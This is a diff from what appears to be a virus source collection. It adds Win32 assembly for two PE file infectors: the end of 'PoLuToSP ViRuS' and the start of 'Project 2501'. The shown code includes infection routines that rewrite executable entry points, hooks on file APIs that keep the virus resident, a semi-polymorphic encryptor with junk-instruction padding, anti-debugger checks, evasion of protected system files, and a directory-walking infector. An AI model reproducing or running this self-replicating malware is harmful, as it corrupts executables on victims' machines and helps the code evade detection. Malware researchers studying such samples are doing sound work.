+;* Function to Set the Directory Entry * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +PonerDirectorio proc + push ecx ; Save some registers + push ebx + mov edi,edx + add edi,78h ; Find the Directory address of infected File + mov ecx,[edx+74h] +Poner@2: + mov ebx,[edi] ; Get the variable that points to the last section + cmp ebx,[esi+0Ch] ; if exist... + jz Poner@1 + add edi,08h + loop Poner@2 +Poner@3: + pop ebx ; Finish! + pop ecx + ret +Poner@1: + add edi,04h ; ...And change it with the new values + mov [edi],eax + jmp Poner@3 +PonerDirectorio endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to protect a Memory Section * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +ProtegerMemoria proc + lea eax,[H_Proteccion+ebp] ; Well, push the initial values + push eax ; of the block and Protect it + push dword ptr[InfoMemoria.Protect+ebp] + push dword ptr[InfoMemoria.RegionSize+ebp] + push dword ptr[InfoMemoria.BaseAddress+ebp] + call [@_VirtualProtect+ebp] ; Replace the real protection set + ret +ProtegerMemoria endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to generate a Random Number * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +Random proc + mov eax,[H_Semilla+ebp] ; Humm... a typical Random Number Generator + imul eax,eax,65h ; Take a seed and make another random number + add eax,0167h ; with this process + mov [H_Semilla+ebp],eax ; Save the random value + ret +Random endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to fill in with shit instructions the Decriptor * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +RellenarBasura proc + or ecx,ecx ; If counter is zero... finish it + jz RellenarError@1 +Rellenar@1: + cmp ecx,03h ; If not... write 3 bytes instructions + jc Rellenar@2 + call Random ; A random instruction + mov edx,eax + lea ebx,[V_TresBytes+ebp] + movzx eax,dl + and al,1Fh + mov dl,al + shl al,01h + add al,dl + add ebx,eax + mov ax,[ebx] + stosw ; Put the instruction in decriptor place + mov al,[ebx+02h] + stosb + dec ecx ; Decrement the counter + dec ecx + dec ecx + jmp Rellenar@1 +Rellenar@2: + cmp ecx,02h ; Or 2 bytes instructions + jc Rellenar@3 + call Random ; A random instruction + mov edx,eax + lea ebx,[V_DosBytes+ebp] + movzx eax,dl + and al,1Fh + shl al,01h + add ebx,eax + mov ax,[ebx] + stosw ; Storage it + dec ecx ; And decrement the counter + dec ecx + jmp Rellenar@2 +Rellenar@3: + cmp ecx,01h ; Or 1 byte instructions + jc RellenarError@1 + call Random ; We want a random one! + mov edx,eax + lea ebx,[V_UnByte+ebp] + movzx eax,dl + and al,0Fh + add ebx,eax + mov al,[ebx] + stosb ; Put it and decrement... + dec ecx + jmp Rellenar@3 +RellenarError@1: + ret +RellenarBasura endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Payload Sound Loop * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +RunBeep proc + push ebx ; Hahaha... a simple loop efect with the Internal + push edi ; speaker (I guess everybody knows) + push esi + mov ebx,20h ; Loop Counter + mov edi,01F4h ; Initial frecuence + mov esi,19h ; Duration of Sound +RunBeepBucle@1: + push esi + push edi + call [@_Beep+ebp] ; Hahaha... (But don't work in win9x first editions) + add edi,64h ; Bring up frecuence...:P + dec ebx + jnz RunBeepBucle@1 ; And on, and on... + pop esi + pop edi + pop ebx + ret ; Return to caller process +RunBeep endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Load Libraries for Payload * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +RunPayload proc + lea esi,[N_UserLib+ebp] ; Try to load the User32.dll... + call LoadLibrary + or eax,eax + jz RunPayloadError@1 ; If error -> go out + mov esi,eax + lea edi,[V_Nombres@2+ebp] ; If not -> get all APIs needed + lea ebx,[V_Direcciones@2+ebp] + call FullApiAddress + or eax,eax + jz RunPayloadError@1 + lea esi,[N_GdiLib+ebp] ; ... And the Gdi.dll Libraries + call LoadLibrary + or eax,eax + jz RunPayloadError@1 + mov esi,eax + lea edi,[V_Nombres@3+ebp] + lea ebx,[V_Direcciones@3+ebp] + call FullApiAddress ; And get all APIs needed + or eax,eax + jz RunPayloadError@1 + call Payload ; If no error -> Run Payload +RunPayloadError@1: + ret +RunPayload endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function Runtime Virus (Direct Action Part) * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +RuntimeVirus proc + lea eax,[BufferUno+ebp] ; Well, get the actual Path + push eax + push MAX_PATH + call [@_GetCurrentDirectoryA+ebp] + mov [H_NumLetrasA+ebp],eax ; Save Path Lenght + push MAX_PATH + lea eax,[BufferDos+ebp] ; Get the Windows Path + push eax + call [@_GetWindowsDirectoryA+ebp] + mov [H_NumLetrasB+ebp],eax ; Save Path Lenght + xor ecx,ecx + call SetBufferTres ; Set Buffer for SFC calls + call BuscarArchivos ; Time to find some Files... ;P + lea eax,[BufferDos+ebp] + push eax + call [@_SetCurrentDirectoryA+ebp] ; Move to Windows Directory + xor ecx,ecx + inc ecx + call SetBufferTres ; Set Buffer for SFC calls + call BuscarArchivos ; hahaha... more Files!!! + push MAX_PATH + lea eax,[BufferDos+ebp] ; Get the System Path + push eax + call [@_GetSystemDirectoryA+ebp] + mov [H_NumLetrasB+ebp],eax ; Save Path Lenght + lea eax,[BufferDos+ebp] + push eax + call [@_SetCurrentDirectoryA+ebp] ; Move to System Directory + xor ecx,ecx + inc ecx + call SetBufferTres ; Set Buffer for SFC calls + call BuscarArchivos ; Ufff... do you want more File? + lea eax,[BufferUno+ebp] ; Return to initial Host Path + push eax + call [@_SetCurrentDirectoryA+ebp] + ret +RuntimeVirus endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Set all Resident Hooks * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +SetAllHooks proc + lea edi,[V_Direcciones@4+ebp] ; Get the APIs we wanna Hook + lea esi,[V_Offsets@1+ebp] ; And the offsets of Hooking Process +SetAll@1: + call SetHook ; And Make a little changes in Import Header!!! + or eax,eax + jz SetAllError@1 ; Hummm, API not found + call DesprotegerMemoria ; If Memory is protected... try to Unprotect + or eax,eax ; it first... whahaha + jz SetAllError@1 + lodsd + add eax,ebp + mov [ebx],eax ; Make API reference point to our process + add eax,offset V_DeltaHook - offset HookCopyFileA + mov [eax],ebp + add eax,offset V_JumpHook - offset V_DeltaHook + mov ebx,[edi] + mov [eax],ebx + call ProtegerMemoria ; And Protect again the Memory Block +SetAll@2: + add edi,04h ; Well, the next one API + mov eax,[edi] + or eax,eax ; Is it the last one? No? go on + jnz SetAll@1 + ret +SetAllError@1: + add esi,04h ; Great, the next offset + jmp SetAll@2 +SetAllHooks endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to put a Path in Buffer * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +SetBufferTres proc + push esi ; Save some registers + push edi + or ecx,ecx ; Actual Path or Other? + jz SetBuffer@1 + lea esi,[BufferDos+ebp] ; If Windows or System Path + mov ecx,[H_NumLetrasB+ebp] ; Set some values + jmp SetBuffer@2 +SetBuffer@1: + lea esi,[BufferUno+ebp] ; If actual Path + mov ecx,[H_NumLetrasA+ebp] ; Set some values +SetBuffer@2: + lea edi,[BufferTres+ebp] + xor eax,eax +SetBuffer@3: + lodsb ; Make BufferTres with the actual Path, but + stosw ; in Unicode instead Ansi string + loop SetBuffer@3 + xor eax,eax + stosw ; This is for a SfcIsFileProtected API + pop edi ; that needs absolute Paths in Unicode + pop esi + ret +SetBufferTres endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to write the Entry Point * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +SetEntryPoint proc + push esi ; Make the Enty Point Value point to the last + push ebx ; Code Section 6 bytes + lea esi,[V_EntryPoint+ebp] + mov eax,[H_RvaText+ebp] + mov [edx+28h],eax ; This is the new Entry Point... hahaha + add eax,05h + sub ebx,eax ; Path the relative call + mov [esi+01h],ebx + mov edi,[H_RawText+ebp] ; And Put there the relative call to the Virus + lodsb ; and some stuff + stosb + lodsd + stosd + lodsb + stosb + mov esi,[H_TextHeader+ebp] ; Actualice the Code Section Virtual Size + add dword ptr[esi+08h],06h + pop ebx + pop esi + ret ; Bye! +SetEntryPoint endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to set the Re-Entry of Virus * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +SetReEntrada proc + lea esi,[V_ReEntrada+ebp] ; Because the virus have first the + lea edi,[V_Desencriptar+ebp] ; decritor routine... if the program + lodsb ; is called 2 or 3 times (like CPL ones) + stosb ; we have to change the first bytes + lodsd ; with a simple call to a FindFiles + stosd ; routine in the current Path and Finish + lodsw + stosw ; Move Instructions from a Internal Part + lodsw ; to the Virus Begin + stosw + lodsw + stosw + lodsd + stosd + lodsw + stosw + ret ; And Finish! +SetReEntrada endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Set one Resident Hook * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +SetHook proc + push esi ; Go to the Import Section Header + push edi + mov esi,[H_ImageBase+ebp] + add esi,[esi+3Ch] + add esi,80h + lodsd + add eax,[H_ImageBase+ebp] ; We have the poiner to Section Header + mov esi,eax +SetHook@1: + push esi + mov esi,[esi+0Ch] ; Well, look for a Kernel32 decriptor... + or esi,esi + jz SetHookError@1 + add esi,[H_ImageBase+ebp] + lea edi,[N_Kernel+ebp] + mov ecx,08h + cld + rep cmpsb ; Compare it, if equal -> go on + pop esi + jz SetHook@2 + add esi,14h + jmp SetHook@1 +SetHook@2: + mov edx,[esi+10h] ; Great!... Find the API we wanna Hook + add edx,[H_ImageBase+ebp] + xor ebx,ebx + pop edi + mov eax,[edi] ; Look on First Thunk... whahaha! +SetHook@4: + mov ecx,[edx] + or ecx,ecx + jz SetHookError@2 + cmp ecx,eax ; Check it now!... by address + jz SetHook@3 + add edx,04h ; Try the next one + inc ebx + jmp SetHook@4 ; And go back +SetHook@3: + shl ebx,02h ; We have the Address of the API reference + add ebx,[esi+10h] ; in the Import Header... whahaha + add ebx,[H_ImageBase+ebp] + pop esi + xor eax,eax ; Great! Done! eax non zero value + inc eax + ret +SetHookError@1: + pop esi + pop edi +SetHookError@2: + pop esi + xor eax,eax ; Ups! Shit! eax zero + ret +SetHook endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Check if a File is SFC protected * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +SfcIsFileProtected proc + push esi ; Save some Registers + push edi + mov ecx,[@_SfcIsFileProtected+ebp] ; Have the System SFC protection? + or ecx,ecx + jz NoHaySfc@1 ; If not... skip this part! + lea edi,[BufferTres+ebp] + push edi + xor eax,eax ; Take the actual Path in Unicode +SfcBucle@1: ; and add to it the File Name + scasw + jnz SfcBucle@1 + mov al,'\' ; And now the Actual File Name + mov [edi-02h],ax + mov ebx,edi +SfcBucle@2: + lodsb + stosw + or eax,eax + jnz SfcBucle@2 + push eax + call ecx ; Is File with SFC protected? + dec ebx + dec ebx + xor ecx,ecx + mov [ebx],cx ; Make the actual Path as the begin +NoHaySfc@1: + pop edi + pop esi + ret ; eax zero if not protected with SFC +SfcIsFileProtected endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Truncate the Host Size * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +TruncarHostNuevo proc + xor eax,eax ; Truncate the Open File + push eax + push eax + push ebx + push dword ptr[H_HandleOpen+ebp] ; Set the File Pointer where we want + call [@_SetFilePointer+ebp] + push dword ptr[H_HandleOpen+ebp] ; Set there the End of File + call [@_SetEndOfFile+ebp] + ret +TruncarHostNuevo endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Function to Unmap one File from Memory * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +UnmapFile proc + push ebx + call [@_UnmapViewOfFile+ebp] ; Simple Unmap the File from Memory + ret +UnmapFile endp + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* All Posible Decriptors of Virus * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_Decriptores: +V_Dec@0: + mov ecx,5A5A5A5Ah ; All the Decriptors basic structure... + mov edx,TamVirus@1 ; But many instructions are changed + lea esi,[V_Virus+ebp] ; while we're building a new decriptor +V_Buc@0: + ror byte ptr[esi],cl ; Operate with one byte + add byte ptr[esi],cl + inc esi ; Increment the pointer + ror ecx,08h ; Rotate the 32 bits Key + dec edx ; Decrement the counter and go on + jnz V_Buc@0 + +V_Dec@1: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@1: + xor byte ptr[esi],cl + add byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@1 + +V_Dec@2: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@2: + add byte ptr[esi],cl + rol byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@2 + +V_Dec@3: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@3: + rol byte ptr[esi],cl + xor byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@3 + +V_Dec@4: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@4: + xor byte ptr[esi],cl + sub byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@4 + +V_Dec@5: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@5: + sub byte ptr[esi],cl + ror byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@5 + +V_Dec@6: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@6: + ror byte ptr[esi],cl + xor byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@6 + +V_Dec@7: + mov ecx,5A5A5A5Ah + mov edx,TamVirus@1 + lea esi,[V_Virus+ebp] +V_Buc@7: + add byte ptr[esi],cl + ror byte ptr[esi],cl + inc esi + ror ecx,08h + dec edx + jnz V_Buc@7 + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* All Posible Encriptor instructions of Virus * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_Encriptores: +V_Enc@0: + sub byte ptr[edi],cl ; All the possible Encriptors that are used + rol byte ptr[edi],cl ; when we Encript the Virus Body in a New Host + +V_Enc@1: + sub byte ptr[edi],cl ; Operate with one byte + xor byte ptr[edi],cl + +V_Enc@2: + ror byte ptr[edi],cl + sub byte ptr[edi],cl + +V_Enc@3: + xor byte ptr[edi],cl + ror byte ptr[edi],cl + +V_Enc@4: + add byte ptr[edi],cl + xor byte ptr[edi],cl + +V_Enc@5: + rol byte ptr[edi],cl + add byte ptr[edi],cl + +V_Enc@6: + xor byte ptr[edi],cl + rol byte ptr[edi],cl + +V_Enc@7: + rol byte ptr[edi],cl + sub byte ptr[edi],cl + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Shit Instructions used by the Semi-Morfic engine * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_UnByte: + aaa ; Shit Instructions (1 Byte) + aas ; The other registers are used in decriptor routine + clc + cmc + daa + das + dec eax + dec ebx + inc eax + inc ebx + lahf + nop + sahf + stc + xchg eax,ebx + xchg ebx,eax + +V_DosBytes: + add eax,ebx ; Shit Instructions (2 Bytes) + add ebx,eax + adc eax,ebx + adc ebx,eax + and eax,ebx + and ebx,eax + bswap eax + bswap ebx + cbw + mov eax,ebx + mov ebx,eax + neg eax + neg ebx + not eax + not ebx + or eax,ebx + or ebx,eax + push eax + pop ebx + push ebx + pop eax + pushf + popf + rol eax,cl + rol ebx,cl + ror eax,cl + ror ebx,cl + shl eax,cl + shl ebx,cl + shr eax,cl + shr ebx,cl + xor eax,eax + xor ebx,ebx + xor eax,ebx + xor ebx,eax + +V_TresBytes: + add ax,bx ; Shit Instructions (3 Bytes) + add bx,ax + adc ax,bx + adc bx,ax + and ax,bx + and bx,ax + bswap ax + bswap bx + lea eax,[eax+ebp] + lea eax,[ebx+ebp] + lea ebx,[eax+ebp] + lea ebx,[ebx+ebp] + mov ax,bx + mov bx,ax + neg ax + neg bx + not ax + not bx + or ax,bx + or bx,ax + rol ax,cl + rol bx,cl + ror ax,cl + ror bx,cl + shl ax,cl + shl bx,cl + shr ax,cl + shr bx,cl + xor ax,ax + xor bx,bx + xor ax,bx + xor bx,ax + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Re-Entry used Instructions * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_ReEntrada: + mov eax,offset BuscarArchivos ; Instructions that are copied to the begin + add eax,ebp ; of Virus, to make possible the Re-Entry + call eax ; in the CPL Files + lea eax,[V_VueltaHost+ebp] ; Make a Search in actual Path and come back + jmp eax ; to the Infected Host + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Entry Point First Instructions * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +V_EntryPoint: + call AlinearCifra ; Instructions that are copied to last + ret ; 6 bytes of Code Section (Hard-Coded) + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Structures used by the Virus * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +BufferDos db MAX_PATH dup (?) ; Windows and System Path +BufferTres dw MAX_PATH dup (?) ; Actual Path in Unicode +BufferUno db MAX_PATH dup (?) ; Initial Path of the Host +DatosArchivo WIN32_FIND_DATA ? ; Structure to Find Files +V_Info@1: +InfoMemoria MEMORY_BASIC_INFORMATION ? ; Structure to Info a Memory Block +V_Info@2: +SysDate SYSTEMTIME ? ; Structure for System Time + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Global Variables used by the Virus * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +H_Alineamiento dd ? ; Section Alignment of the Host +H_AtributosFile dd ? ; Real Attributes of New Host +H_Delta dd ? ; Partial calculated Delta, used in infection +H_HandleArchivo dd ? ; File Handle +H_HandleMapa dd ? ; Map Handle +H_HandleOpen dd ? ; Open Handle +H_HandlePantalla dd ? ; Screen Handle, used in Payload +H_ImageBase dd ? ; The actual Host Image Base +H_NumLetrasA dd ? ; Length of actual Path +H_NumLetrasB dd ? ; Length of Windows or System Path +H_Proteccion dd ? ; Memory Protection +H_RawText dd ? ; Raw of Code Section in New Host +H_RvaHost dd ? ; Entry Point of actual Host +H_RvaText dd ? ; Rva of Code Section in New Host +H_RvaVirus dd ? ; Rva of Virus Entry +H_Semilla dd ? ; Seed used by the Random Number Generator +H_TamHostVirus dd ? ; Size of Total Infected File +H_TextHeader dd ? ; Rva to Code Section Header + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Addresses that we use (APIs, etc...) * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +@_KernelAddress dd ? ; Address used to find Kernel Base and +@_AddressTable dd ? ; the GetProcAddress API +@_NameTable dd ? +@_OrdinalTable dd ? +@_DirArchivo dd ? +@_GetProcAddress dd ? + +V_Direcciones@1: +@_GetFileAttributesA dd ? ; All the APIs addresses needed +@_SetFileAttributesA dd ? +@_SetFileTime dd ? +@_VirtualProtect dd ? +@_VirtualQuery dd ? +@_SetFilePointer dd ? +@_SetEndOfFile dd ? +@_Beep dd ? +@_LoadLibraryA dd ? +@_GetSystemTime dd ? +@_GetTickCount dd ? +@_CreateFileMappingA dd ? +@_MapViewOfFile dd ? +@_UnmapViewOfFile dd ? +@_FindClose dd ? +@_SetCurrentDirectoryA dd ? +@_GetCurrentDirectoryA dd ? +@_GetWindowsDirectoryA dd ? +@_GetSystemDirectoryA dd ? +@_CloseHandle dd ? +@_ExitProcess dd ? +V_Direcciones@4: +@_MoveFileA dd ? +@_CopyFileA dd ? +@_DeleteFileA dd ? +@_CreateFileA dd ? +@_GetModuleHandleA dd ? +@_FindFirstFileA dd ? +@_FindNextFileA dd ? +@_FinalDirecciones dd 00h +V_Direcciones@2: +@_GetDC dd ? +V_Direcciones@3: +@_CreateSolidBrush dd ? +@_SelectObject dd ? +@_Ellipse dd ? +V_Direcciones@5: +@_SfcIsFileProtected dd ? + +V_Offsets@1: +V_Hook@1 dd offset HookMoveFileA ; offsets to process used to hook +V_Hook@2 dd offset HookCopyFileA ; calls in Per-Process Resident +V_Hook@3 dd offset HookDeleteFileA +V_Hook@4 dd offset HookCreateFileA +V_Hook@5 dd offset HookGetModuleHandleA +V_Hook@6 dd offset HookFindFirstFileA +V_Hook@7 dd offset HookFindNextFileA + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* Strings used by the Virus * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** + +N_GdiLib db 'GDI32.dll',0 ; Some Strings for Libraries names +N_IsDebuggerPresent db 'IsDebuggerPresent',0 +N_Kernel db 'KERNEL32',0 +V_Mascara@1: +N_MascaraA db '*.EXE',0 ; Targets Strings +N_MascaraB db '*.SCR',0 +N_MascaraC db '*.CPL',0,0BBh +N_Nice db '\\.\NTICE',0 ; To Avoid SoftIce in win9x and winNT +N_Sice db '\\.\SICE',0 +N_SfcLib db 'SFC.dll',0 +N_UserLib db 'USER32.dll',0 + +V_Nombres@1: +N_GetFileAttributesA db 'GetFileAttributesA',0 ; Strings of all APIs needed +N_SetFileAttributesA db 'SetFileAttributesA',0 +N_SetFileTime db 'SetFileTime',0 +N_VirtualProtect db 'VirtualProtect',0 +N_VirtualQuery db 'VirtualQuery',0 +N_SetFilePointer db 'SetFilePointer',0 +N_SetEndOfFile db 'SetEndOfFile',0 +N_Beep db 'Beep',0 +N_LoadLibraryA db 'LoadLibraryA',0 +N_GetSystemTime db 'GetSystemTime',0 +N_GetTickCount db 'GetTickCount',0 +N_CreateFileMappingA db 'CreateFileMappingA',0 +N_MapViewOfFile db 'MapViewOfFile',0 +N_UnmapViewOfFile db 'UnmapViewOfFile',0 +N_FindClose db 'FindClose',0 +N_SetCurrentDirectoryA db 'SetCurrentDirectoryA',0 +N_GetCurrentDirectoryA db 'GetCurrentDirectoryA',0 +N_GetWindowsDirectoryA db 'GetWindowsDirectoryA',0 +N_GetSystemDirectoryA db 'GetSystemDirectoryA',0 +N_CloseHandle db 'CloseHandle',0 +N_ExitProcess db 'ExitProcess',0 +V_Nombres@4: +N_MoveFileA db 'MoveFileA',0 +N_CopyFileA db 'CopyFileA',0 +N_DeleteFileA db 'DeleteFileA',0 +N_CreateFileA db 'CreateFileA',0 +N_GetModuleHandleA db 'GetModuleHandleA',0 +N_FindFirstFileA db 'FindFirstFileA',0 +N_FindNextFileA db 'FindNextFileA',0,0BBh +V_Nombres@2: +N_GetDC db 'GetDC',0,0BBh +V_Nombres@3: +N_CreateSolidBrush db 'CreateSolidBrush',0 +N_SelectObject db 'SelectObject',0 +N_Ellipse db 'Ellipse',0,0BBh +V_Nombres@5: +N_SfcIsFileProtected db 'SfcIsFileProtected',0,0BBh + +N_PiKaS db 'PoLuToSP ViRuS... VxLabs (Made in Spain)',0 ; A stupid mark + +V_FinalVirus: + + end V_Entrada + +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** +;* (Learning To Live-Dream Theater) PiKaS LaBs 2004 * +;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*** diff --git a/Win32/Win32.Project2501.asm b/Win32/Win32.Project2501.asm new file mode 100644 index 00000000..2b62854c --- /dev/null +++ b/Win32/Win32.Project2501.asm @@ -0,0 +1,578 @@ +comment * + +Name: Project 2501 +OS: Win32 +Coder Belial + +Heya , +this is my first Pe-infector.Wow ,a great feeling +to have finished it. +Credits go out to Lord Julus and BillyBelcebub ,because +of their win32 tuturials.Without them ,i would never +have finished this creation.It took me nearly a year to of reading +to understand all the important aspects of Win32-Assembly. +Greetings go out Wallo ,Raven and the whole Virus-channel on undernet. +Also greetings to BillyBoy from Micro$oft.Thanx for your +nice viriiparadise-OS.But not soooooo much bugs in future ,ok? + +I tested this virus only under Win98 ,so I dont know +wether it works under WinME ,WinNT or Win95.But Im sure somebody will try +it out. +The Virus is a runtime exe infector.It infects all files +in current dir and all his subdirectories.After this ,it makes +one dotdot and infects new files and subdirs until it is +in c:\ or five dotdots are done.The only payload my virus has +is a directory on the desktop named "Project2501".It is +created each run.Im thinking of putting a txtfile +in this directory ,but I have no real motivation +at the moment.A bedder payload is in progress.And +a nice encryption ,I hope.If you think this virus +may be a bit incomplete (no encryption and no kewl +payload) than i have to say: +With releasing this source i release a loaded +gun.In the wrong hands ,it could be awful for some +harmless user.So if I release guns I dont want to release +"full-automatic-guns" .Thats for now + + +BeLiAL + +* + +.586 +.model flat + +.data + +db 0 +db 'This is the first generation of project2501' + +.code + +start: +call delta_setup + +delta_setup: +pop ebp +sub ebp,offset delta_setup + +get_those_apis: +mov eax,dword ptr [esp] +and eax,0ffff0000h +mov ecx,0 +call find_mz_and_pe +call find_all_apis + +Infection_part: +mov byte ptr [ebp+dir_counter],0 +mov byte ptr [ebp+am_i_up],0 +mov eax,dword ptr [ebp+image_base] +mov dword ptr [ebp+image_base2],eax +mov eax,dword ptr [ebp+old_entry_point] +mov dword ptr [ebp+old_entry_point2],eax +call seek_and_destroy + +payload_part: +call payload + +reanimation_part: +cmp ebp,0 +je exit_here +mov eax,dword ptr [ebp+image_base2] +add eax,dword ptr [ebp+old_entry_point2] +jmp eax + 